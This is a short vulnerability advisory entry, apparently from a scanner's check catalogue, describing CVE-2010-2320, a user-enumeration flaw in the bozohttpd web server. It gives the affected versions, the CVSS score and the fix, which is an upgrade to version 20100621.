Summary
This host is running bozotic HTTP server and is prone to information disclosure vulnerability.
Impact
Successful exploitation will allow attacker to determine the existence of a user and potentially disclose the user's files.
Impact Level: Application
Solution
Upgrade to bozotic HTTP server version 20100621 or later, For updates refer to http://www.eterna.com.au/bozohttpd/
Insight
The server is not properly handling requests to a user's public_html folder while the folder does not exist. This can be exploited to determine the existence of user accounts via multiple requests for URIs beginning with /~ sequences.
Affected
bozotic HTTP server (aka bozohttpd) versions before 20100621.
References
Severity
Classification
-
CVE CVE-2010-2320 -
CVSS Base Score: 5.0
AV:N/AC:L/Au:N/C:P/I:N/A:N
Related Vulnerabilities
- Apache Tomcat Denial Of Service Vulnerability (Windows)
- IBM WebSphere Application Server (WAS) XSS and CSRF Vulnerabilities
- IBM HTTP Server Multiple Cross Site Scripting Vulnerabilities
- IBM WebSphere Application Server Multiple CSRF Vulnerabilities
- HServer Webserver Multiple Directory Traversal Vulnerabilities